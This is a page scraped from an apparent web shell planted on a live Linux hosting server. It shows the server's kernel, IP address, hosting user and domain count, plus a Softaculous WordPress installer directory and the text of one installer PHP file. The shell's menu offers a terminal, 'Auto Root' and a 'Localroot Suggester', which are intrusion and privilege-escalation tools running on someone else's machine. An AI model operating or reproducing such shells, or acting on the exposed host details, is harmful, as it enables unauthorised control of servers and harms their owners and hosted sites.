Linux host2.healingcodesinfo.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
Apache
Server IP : 69.167.168.125 & Your IP : 216.73.216.208
Domains : 126 Domain
User : christia
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
wp59 /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2026-03-12 15:03
languages
[ DIR ]
drwxr-xr-x
2026-03-12 15:03
php53
[ DIR ]
drwxr-xr-x
2026-03-12 15:03
php56
[ DIR ]
drwxr-xr-x
2026-03-12 15:03
php71
[ DIR ]
drwxr-xr-x
2026-03-12 15:03
php81
[ DIR ]
drwxr-xr-x
2026-03-12 15:03
php82
[ DIR ]
drwxr-xr-x
2026-03-12 15:03
plugins
[ DIR ]
drwxr-xr-x
2026-03-12 15:03
.htaccess
482
B
-rw-r--r--
2022-05-25 07:33
_htaccess
553
B
-rw-r--r--
2022-05-25 07:33
_index.php
59
B
-rw-r--r--
2022-05-25 07:33
_wp-config.php
3.07
KB
-rw-r--r--
2022-05-25 07:33
add_user.php
461
B
-rw-r--r--
2022-05-25 07:33
backup.php
3.03
KB
-rw-r--r--
2026-03-12 13:05
check_charset.php
2.02
KB
-rw-r--r--
2022-05-25 07:33
clone.php
30.98
KB
-rw-r--r--
2026-03-12 13:05
clone.xml
497
B
-rw-r--r--
2022-05-25 07:33
edit.php
9.45
KB
-rw-r--r--
2026-03-12 13:05
edit.xml
1.76
KB
-rw-r--r--
2023-10-03 08:59
extend.php
83.14
KB
-rw-r--r--
2026-03-12 13:05
fileindex.php
291
B
-rw-r--r--
2022-05-25 07:33
import.php
6.53
KB
-rw-r--r--
2026-03-12 13:05
info.xml
14.91
KB
-rw-r--r--
2026-03-12 07:08
install.js
1.46
KB
-rw-r--r--
2025-01-03 13:25
install.php
31.44
KB
-rw-r--r--
2026-03-12 13:05
install.xml
5.65
KB
-rw-r--r--
2025-02-24 07:15
md5
5.35
KB
-rw-r--r--
2026-03-12 13:05
notes.txt
5.81
KB
-rw-r--r--
2025-10-09 12:12
plugin_activate.php
596
B
-rw-r--r--
2022-05-25 07:33
plugin_deactivate.php
613
B
-rw-r--r--
2022-05-25 07:33
sign_on.php
3.28
KB
-rw-r--r--
2025-01-28 09:17
soft.htaccess
127
B
-rw-r--r--
2022-05-25 07:33
upgrade.php
13.67
KB
-rw-r--r--
2026-03-12 13:05
upgrade.xml
1.59
KB
-rw-r--r--
2023-10-03 08:59
wp-config.php
2.78
KB
-rw-r--r--
2022-05-25 07:33
Save
Rename
<?php @unlink(__FILE__); // Validate if the request is from Softaculous if($_REQUEST['pass'] != '[[autopass]]'){ die("Unauthorized Access"); } require_once('wp-blog-header.php'); require_once('wp-includes/pluggable.php'); require_once('wp-admin/includes/plugin.php'); $plugins_to_activate = '[[plugins_to_activate]]'; $plugins_to_activate = unserialize($plugins_to_activate); $ret = array(); foreach($plugins_to_activate as $plugn_file){ // null means success $ret[$plugn_file] = activate_plugin($plugn_file); } echo '<plugin_activate>'.serialize($ret).'</plugin_activate>'; exit(0);